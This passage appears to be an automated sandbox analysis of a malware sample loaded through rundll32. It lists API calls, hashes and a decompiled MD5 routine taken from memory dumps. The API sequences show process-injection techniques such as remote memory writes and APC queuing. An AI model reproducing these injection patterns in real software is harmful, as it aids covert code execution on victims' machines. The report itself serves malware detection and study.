                                                          • Instruction Fuzzy Hash: 5E114FB260030BAFD710EBAAEC85D6637ECFB457447064926F946D7201EF38EC099B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 055855F8
                                                            • Part of subcall function 0558A71C: NtAllocateVirtualMemory.NTDLL(05585620,00000000,00000000,05585620,00003000,00000040), ref: 0558A74D
                                                            • Part of subcall function 0558A71C: RtlNtStatusToDosError.NTDLL(00000000), ref: 0558A754
                                                            • Part of subcall function 0558A71C: SetLastError.KERNEL32(00000000), ref: 0558A75B
                                                          • GetLastError.KERNEL32(?,00000318,00000008), ref: 05585708
                                                            • Part of subcall function 05579D36: RtlNtStatusToDosError.NTDLL(00000000), ref: 05579D4E
                                                          • memcpy.NTDLL(00000218,05594EE0,00000100,?,00010003,?,?,00000318,00000008), ref: 05585687
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 055856E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                                          • String ID:
                                                          • API String ID: 2966525677-3916222277
                                                          • Opcode ID: e0ce07847dbcdd380bebc373c8b19becc77b940362ec6fb429a63a82793c7095
                                                          • Instruction ID: 7fcc60c7679421bde10f40183834b055f485651630d785622115e7cb32a5ed77
                                                          • Opcode Fuzzy Hash: e0ce07847dbcdd380bebc373c8b19becc77b940362ec6fb429a63a82793c7095
                                                          • Instruction Fuzzy Hash: 95319371901609EFDF20EFA5D889BBAB7F9FB04354F10456EE546E7240EB30AE448B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$memcpy
                                                          • String ID:
                                                          • API String ID: 368790112-0
                                                          • Opcode ID: 524accb04d52cb7e0153776583129b7142651e0a49ba38366245d02829f7103b
                                                          • Instruction ID: f847dfea49ac633d983e58fc18b814b82e5a67bc389af507ef1c85b4f0540506
                                                          • Opcode Fuzzy Hash: 524accb04d52cb7e0153776583129b7142651e0a49ba38366245d02829f7103b
                                                          • Instruction Fuzzy Hash: E5F1F130604B9ADFCB31CFA9D484AEABBF5FF41700F14496DC5D796681D232AA45CB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 055751BC
                                                          • lstrlenW.KERNEL32(?), ref: 055751CA
                                                          • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 055751F5
                                                          • lstrcpyW.KERNEL32(00000006,00000000), ref: 05575222
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Query$lstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3961825720-0
                                                          • Opcode ID: 8e82a22ea62e22467e322177ae3c8f4b7de8e5befaac765c49714c9ab696be56
                                                          • Instruction ID: 57ac9ce55849acd76a7231bcb73d25b1f79b9c479069e8d8d0faa97d4e422666
                                                          • Opcode Fuzzy Hash: 8e82a22ea62e22467e322177ae3c8f4b7de8e5befaac765c49714c9ab696be56
                                                          • Instruction Fuzzy Hash: 40415B7161420EEFDF118FE8D884AAEBBB8FF04310F154069F906A6210EB75DA15AB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0559C1A8,0559C144), ref: 0558E417
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 0558E462
                                                            • Part of subcall function 05579C77: CreateThread.KERNEL32(00000000,00000000,00000000,05572D6E,00000000,0558EB74), ref: 05579C8E
                                                            • Part of subcall function 05579C77: QueueUserAPC.KERNEL32(05572D6E,00000000,05571AE4,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CA3
                                                            • Part of subcall function 05579C77: GetLastError.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CAE
                                                            • Part of subcall function 05579C77: TerminateThread.KERNEL32(00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CB8
                                                            • Part of subcall function 05579C77: CloseHandle.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CBF
                                                            • Part of subcall function 05579C77: SetLastError.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CC8
                                                          • GetLastError.KERNEL32(055930B6,00000000,00000000), ref: 0558E44A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0558E45A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 1700061692-0
                                                          • Opcode ID: ae253109197d4d7be0e11c45283640cf2c90e4f6ae762ae55b82dd6f740a2e39
                                                          • Instruction ID: c60f8342484599c9ae6a209e7554ac6cef8f1d769636e66a3d32557ddd1b5952
                                                          • Opcode Fuzzy Hash: ae253109197d4d7be0e11c45283640cf2c90e4f6ae762ae55b82dd6f740a2e39
                                                          • Instruction Fuzzy Hash: 9BF02870305211AFF7146B689C8AE373BBCFB49371B110236F516D23E0DA684C09AA78
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQueryInformationThread.NTDLL(00000000,00000000,?,0000001C,00000000), ref: 05590BBF
                                                          • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 05590BFF
                                                            • Part of subcall function 05588890: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,055856C2,00000000,?,055856C2,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 055888AE
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05590C08
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                                                          • String ID:
                                                          • API String ID: 4036914670-0
                                                          • Opcode ID: 4b5491ca9629c989ab6d8d1645b9861844e5d3d726a4be6af158bb5ef77b9ea3
                                                          • Instruction ID: 6c31fcff4fe2980717242cdddd1aa7127caf6013cc38a41dbd82df2aa575283f
                                                          • Opcode Fuzzy Hash: 4b5491ca9629c989ab6d8d1645b9861844e5d3d726a4be6af158bb5ef77b9ea3
                                                          • Instruction Fuzzy Hash: 8A01FF75A40108FBEF10AB95DD49DEEBBBEFB84700F100425FA41E2060E779D944DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 055757CD
                                                          • RtlNtStatusToDosError.NTDLL(C000009A), ref: 05575804
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                                          • String ID:
                                                          • API String ID: 2533303245-0
                                                          • Opcode ID: f24019a7e138dd3574348eb1f9148ce34f9df54185f68cfa9915a86c9b077320
                                                          • Instruction ID: 4559903a96b10209a5522ee9316bf5d5b25bc2f66cb0aed82c3205f990143bfa
                                                          • Opcode Fuzzy Hash: f24019a7e138dd3574348eb1f9148ce34f9df54185f68cfa9915a86c9b077320
                                                          • Instruction Fuzzy Hash: 6701FE3690252CFBDB219A95E948DAFBB69FF81A90F160155BD0667100F7348E01D6D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 05580FDC
                                                          • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 05580FF4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuerymemset
                                                          • String ID:
                                                          • API String ID: 2040988606-0
                                                          • Opcode ID: 3c34bc7d07feb9346174ce94757bab58973c791fbb1ba974ca9555ed02862776
                                                          • Instruction ID: 908d2d20e14aac828618faebbffcd63743f2fae8b44095bf802fb1d80c97934b
                                                          • Opcode Fuzzy Hash: 3c34bc7d07feb9346174ce94757bab58973c791fbb1ba974ca9555ed02862776
                                                          • Instruction Fuzzy Hash: 0CF0F475A04259BADB21EA91DC09FEEBBBCAB04740F004061AA08F6191E774EA55CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 05580D1C
                                                          • SetLastError.KERNEL32(00000000,?,05577A37,?,?,?,00000040,?,?,?,?), ref: 05580D23
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$LastStatus
                                                          • String ID:
                                                          • API String ID: 4076355890-0
                                                          • Opcode ID: 0a88b2ba4dd368480cec6a95ba19211e43f1a65978ae8beeeac3f595ae4d30f9
                                                          • Instruction ID: f8873c9b2c147880559c1b6e9692072769ed5de7e9708679da4d232286806774
                                                          • Opcode Fuzzy Hash: 0a88b2ba4dd368480cec6a95ba19211e43f1a65978ae8beeeac3f595ae4d30f9
                                                          • Instruction Fuzzy Hash: BDE0123661521EABCF016FD4AC09D9ABF5DFB08791B014021BE01D2131DB35D424ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0557FF81
                                                          • memset.NTDLL ref: 0557FF90
                                                            • Part of subcall function 0559239D: memset.NTDLL ref: 055923AE
                                                            • Part of subcall function 0559239D: memset.NTDLL ref: 055923BA
                                                            • Part of subcall function 0559239D: memset.NTDLL ref: 055923E5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 9a10150b6ce8c76654baede92a6d00dd6eea4b839648e2d8b640ed2c100bc086
                                                          • Instruction ID: b30ddc8a0917a407007ad25708f7c9a964b47b08f4cd83e970b84b58bd93601b
                                                          • Opcode Fuzzy Hash: 9a10150b6ce8c76654baede92a6d00dd6eea4b839648e2d8b640ed2c100bc086
                                                          • Instruction Fuzzy Hash: AE022F70501B65DFCB79CF29D680926BBF1BF457107605A2ED6EB86AA0E731F881CB04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: b58ea40f2933ab93ab55862e6c3319b0444f02855c9852e7845f0c67bc307517
                                                          • Instruction ID: 6055732113628c2d99050b905e21cd9354c3775a77a743607a7ddd9d2050ce7a
                                                          • Opcode Fuzzy Hash: b58ea40f2933ab93ab55862e6c3319b0444f02855c9852e7845f0c67bc307517
                                                          • Instruction Fuzzy Hash: B822847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E00E51754(void* __ecx, intOrPtr* _a4) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				intOrPtr _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				intOrPtr _v72;
                                                          				void _v76;
                                                          				intOrPtr* _t226;
                                                          				signed int _t229;
                                                          				signed int _t231;
                                                          				signed int _t233;
                                                          				signed int _t235;
                                                          				signed int _t237;
                                                          				signed int _t239;
                                                          				signed int _t241;
                                                          				signed int _t243;
                                                          				signed int _t245;
                                                          				signed int _t247;
                                                          				signed int _t249;
                                                          				signed int _t251;
                                                          				signed int _t253;
                                                          				signed int _t255;
                                                          				signed int _t257;
                                                          				signed int _t259;
                                                          				signed int _t274;
                                                          				signed int _t337;
                                                          				void* _t347;
                                                          				signed int _t348;
                                                          				signed int _t350;
                                                          				signed int _t352;
                                                          				signed int _t354;
                                                          				signed int _t356;
                                                          				signed int _t358;
                                                          				signed int _t360;
                                                          				signed int _t362;
                                                          				signed int _t364;
                                                          				signed int _t366;
                                                          				signed int _t375;
                                                          				signed int _t377;
                                                          				signed int _t379;
                                                          				signed int _t381;
                                                          				signed int _t383;
                                                          				intOrPtr* _t399;
                                                          				signed int _t407;
                                                          				signed int _t409;
                                                          				signed int _t411;
                                                          				signed int _t413;
                                                          				signed int _t415;
                                                          				signed int _t417;
                                                          				signed int _t419;
                                                          				signed int _t421;
                                                          				signed int _t423;
                                                          				signed int _t425;
                                                          				signed int _t427;
                                                          				signed int _t429;
                                                          				signed int _t437;
                                                          				signed int _t439;
                                                          				signed int _t441;
                                                          				signed int _t443;
                                                          				signed int _t445;
                                                          				void* _t447;
                                                          				signed int _t507;
                                                          				signed int _t598;
                                                          				signed int _t606;
                                                          				signed int _t612;
                                                          				signed int _t678;
                                                          				signed int* _t681;
                                                          				signed int _t682;
                                                          				signed int _t684;
                                                          				signed int _t689;
                                                          				signed int _t691;
                                                          				signed int _t696;
                                                          				signed int _t698;
                                                          				signed int _t717;
                                                          				signed int _t719;
                                                          				signed int _t721;
                                                          				signed int _t723;
                                                          				signed int _t725;
                                                          				signed int _t727;
                                                          				signed int _t733;
                                                          				signed int _t739;
                                                          				signed int _t741;
                                                          				signed int _t743;
                                                          				signed int _t745;
                                                          				signed int _t747;
                                                          
                                                          				_t226 = _a4;
                                                          				_t347 = __ecx + 2;
                                                          				_t681 =  &_v76;
                                                          				_t447 = 0x10;
                                                          				do {
                                                          					_t274 =  *(_t347 - 1) & 0x000000ff;
                                                          					_t347 = _t347 + 4;
                                                          					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                                                          					_t681 =  &(_t681[1]);
                                                          					_t447 = _t447 - 1;
                                                          				} while (_t447 != 0);
                                                          				_t6 = _t226 + 4; // 0x14eb3fc3
                                                          				_t682 =  *_t6;
                                                          				_t7 = _t226 + 8; // 0x8d08458b
                                                          				_t407 =  *_t7;
                                                          				_t8 = _t226 + 0xc; // 0x56c1184c
                                                          				_t348 =  *_t8;
                                                          				asm("rol eax, 0x7");
                                                          				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                                                          				asm("rol ecx, 0xc");
                                                          				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                                                          				asm("ror edx, 0xf");
                                                          				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                                                          				asm("ror esi, 0xa");
                                                          				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                                                          				_v8 = _t684;
                                                          				_t689 = _v8;
                                                          				asm("rol eax, 0x7");
                                                          				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                                                          				asm("rol ecx, 0xc");
                                                          				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                                                          				asm("ror edx, 0xf");
                                                          				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                                                          				asm("ror esi, 0xa");
                                                          				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                                                          				_v8 = _t691;
                                                          				_t696 = _v8;
                                                          				asm("rol eax, 0x7");
                                                          				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                                                          				asm("rol ecx, 0xc");
                                                          				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                                                          				asm("ror edx, 0xf");
                                                          				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                                                          				asm("ror esi, 0xa");
                                                          				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                                                          				_v8 = _t698;
                                                          				asm("rol eax, 0x7");
                                                          				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                          				asm("rol ecx, 0xc");
                                                          				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                                                          				_t507 =  !_t356;
                                                          				asm("ror edx, 0xf");
                                                          				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                                                          				_v12 = _t415;
                                                          				_v12 =  !_v12;
                                                          				asm("ror esi, 0xa");
                                                          				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                                                          				asm("rol eax, 0x5");
                                                          				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                                                          				asm("rol ecx, 0x9");
                                                          				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                                                          				asm("rol edx, 0xe");
                                                          				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                                                          				asm("ror esi, 0xc");
                                                          				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                                                          				asm("rol eax, 0x5");
                                                          				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                                                          				asm("rol ecx, 0x9");
                                                          				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                                                          				asm("rol edx, 0xe");
                                                          				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                                                          				asm("ror esi, 0xc");
                                                          				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                                                          				asm("rol eax, 0x5");
                                                          				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                                                          				asm("rol ecx, 0x9");
                                                          				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                                                          				asm("rol edx, 0xe");
                                                          				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                                                          				asm("ror esi, 0xc");
                                                          				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                                                          				asm("rol eax, 0x5");
                                                          				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                                                          				asm("rol ecx, 0x9");
                                                          				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                                                          				asm("rol edx, 0xe");
                                                          				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                                                          				asm("ror esi, 0xc");
                                                          				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                                                          				asm("rol eax, 0x4");
                                                          				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                                                          				asm("rol ecx, 0xb");
                                                          				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                                                          				asm("rol edx, 0x10");
                                                          				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                                                          				_t598 = _t366 ^ _t425;
                                                          				asm("ror esi, 0x9");
                                                          				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                                                          				asm("rol eax, 0x4");
                                                          				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                                          				asm("rol edi, 0xb");
                                                          				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                                          				asm("rol edx, 0x10");
                                                          				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                                          				_t337 = _t606 ^ _t427;
                                                          				asm("ror ecx, 0x9");
                                                          				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                                          				asm("rol eax, 0x4");
                                                          				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                                          				asm("rol esi, 0xb");
                                                          				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                                          				asm("rol edi, 0x10");
                                                          				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                                          				_t429 = _t733 ^ _t612;
                                                          				asm("ror ecx, 0x9");
                                                          				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                                          				asm("rol eax, 0x4");
                                                          				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                                          				asm("rol edx, 0xb");
                                                          				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                                          				asm("rol esi, 0x10");
                                                          				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                                          				asm("ror ecx, 0x9");
                                                          				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                                          				asm("rol eax, 0x6");
                                                          				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                                          				asm("rol edx, 0xa");
                                                          				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                                          				asm("rol esi, 0xf");
                                                          				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                                          				asm("ror ecx, 0xb");
                                                          				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                                          				asm("rol eax, 0x6");
                                                          				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                                          				asm("rol edx, 0xa");
                                                          				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                                          				asm("rol esi, 0xf");
                                                          				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                                          				asm("ror ecx, 0xb");
                                                          				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                                          				asm("rol eax, 0x6");
                                                          				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                                          				asm("rol edx, 0xa");
                                                          				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                                          				asm("rol esi, 0xf");
                                                          				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                                          				asm("ror edi, 0xb");
                                                          				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                                          				asm("rol eax, 0x6");
                                                          				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                                          				asm("rol edx, 0xa");
                                                          				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                                          				_t399 = _a4;
                                                          				asm("rol esi, 0xf");
                                                          				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                                          				 *_t399 =  *_t399 + _t259;
                                                          				asm("ror eax, 0xb");
                                                          				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                                          				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                                          				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                                          				return memset( &_v76, 0, 0x40);
                                                          			}

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
                                                          • Instruction ID: 3ca8e98d900b305641cc2184660c30c92b31d7c029c1bc7777569b754f5fa0ae
                                                          • Opcode Fuzzy Hash: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
                                                          • Instruction Fuzzy Hash: 4122847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 68f28effd9e2d5b56ceb96e6f5b78ecafee3ce2e99518e13e48cbe7c1065c252
                                                          • Instruction ID: 5b7a32432a018745f404fb7ed3865bb9a0c7cc2ea1adc3975fa0ebb99a95740c
                                                          • Opcode Fuzzy Hash: 68f28effd9e2d5b56ceb96e6f5b78ecafee3ce2e99518e13e48cbe7c1065c252
                                                          • Instruction Fuzzy Hash: 6C428B74A04B46CFCB29CF69C490ABABBF2FF49304F14896DC48B97651E738A585CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(?,?,00000000,000000FE,?,?,00000000), ref: 05584777
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: ac1e0b75224bfff75b51d28beab584eabc0336db60f942c72381f0595546712a
                                                          • Instruction ID: c0b861ad988b9399404c8218c83218477c5b569bbcc156b49d391c79e63678e1
